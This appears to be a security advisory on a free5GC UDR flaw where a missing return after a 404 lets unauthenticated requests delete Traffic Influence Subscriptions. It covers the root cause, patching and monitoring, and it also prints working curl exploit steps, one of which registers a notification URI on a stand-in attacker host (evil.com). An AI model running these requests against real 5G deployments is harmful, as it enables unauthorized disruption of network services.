Listen to this Post
The vulnerability exists in the free5GC UDR service’s DELETE endpoint: /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId}. The handler is designed to only accept `influenceId` exactly equal to "subs-to-notify". In the function `HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete` inside ./free5gc_4-2-1/free5gc/NFs/udr/internal/sbi/api_datarepository.go, the code checks if influenceId != "subs-to-notify". If true, it calls `c.String(http.StatusNotFound, “404 page not found”)` but does not return after that call. Execution then proceeds to s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdDeleteProcedure(c, subscriptionId), which deletes the subscription identified by `subscriptionId` regardless of the invalid path. An attacker sends a DELETE request with an arbitrary `influenceId` (e.g., WRONGID) and a valid subscriptionId. The server responds with HTTP 404 Not Found, misleading the attacker into thinking the operation failed, but the subscription is actually deleted. The missing `return` statement after the 404 response is the root cause. No authentication is required; only network access to the 5G Service Based Interface (SBI) and a valid `subscriptionId` (obtainable via a prior POST request) is needed. The vulnerability allows unauthenticated unauthorized deletion of Traffic Influence Subscriptions, disrupting policy notification workflows. The patch adds a `return` statement after sending the 404 response.
DailyCVE form:
Platform: free5GC UDR
Version: 4.2.1 (affected)
Vulnerability: Improper path validation
Severity: Medium
date: 2026-04-14
Prediction: Patch already available
Analytics under What Undercode Say:
Check vulnerable handler behavior grep -A5 'HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete' free5gc/NFs/udr/internal/sbi/api_datarepository.go Simulate missing return vulnerability curl -X DELETE "http://<udr-host>/nudr-dr/v2/application-data/influenceData/WRONGID/87615e16" -v Observe 404 but subscription deleted Verify deletion curl -X GET "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify/87615e16" -v
Exploit:
Create subscription to get valid subscriptionId
curl -X POST "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify" \
-H "Content-Type: application/json" \
-d '{"notificationUri":"http://evil.com/notify","dnns":["internet"],"supis":["imsi-222777483957498"]}'
Capture subscriptionId from 201 response
Delete via invalid path
curl -X DELETE "http://<udr-host>/nudr-dr/v2/application-data/influenceData/ANYTHING/<subscriptionId>"
Receives 404 but deletion successful
Protection from this CVE
- Apply the official patch: add `return` after `c.String(http.StatusNotFound, “404 page not found”)` in
api_datarepository.go. - Restrict SBI access using network segmentation (firewall, VLANs) to prevent untrusted parties from reaching the UDR.
- Monitor logs for DELETE requests to invalid `influenceId` values followed by subscription state changes.
- Upgrade free5GC to a version containing the fix (post-4.2.1).
Impact
- Unauthenticated attacker deletes any Traffic Influence Subscription with known/guessed
subscriptionId. - Disrupts policy notifications, removes active subscription state, and causes misleading 404 responses that hide the attack.
- Affects any free5GC deployment where the SBI is exposed to untrusted networks (e.g., misconfigured segmentation, rogue NF, compromised internal host).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

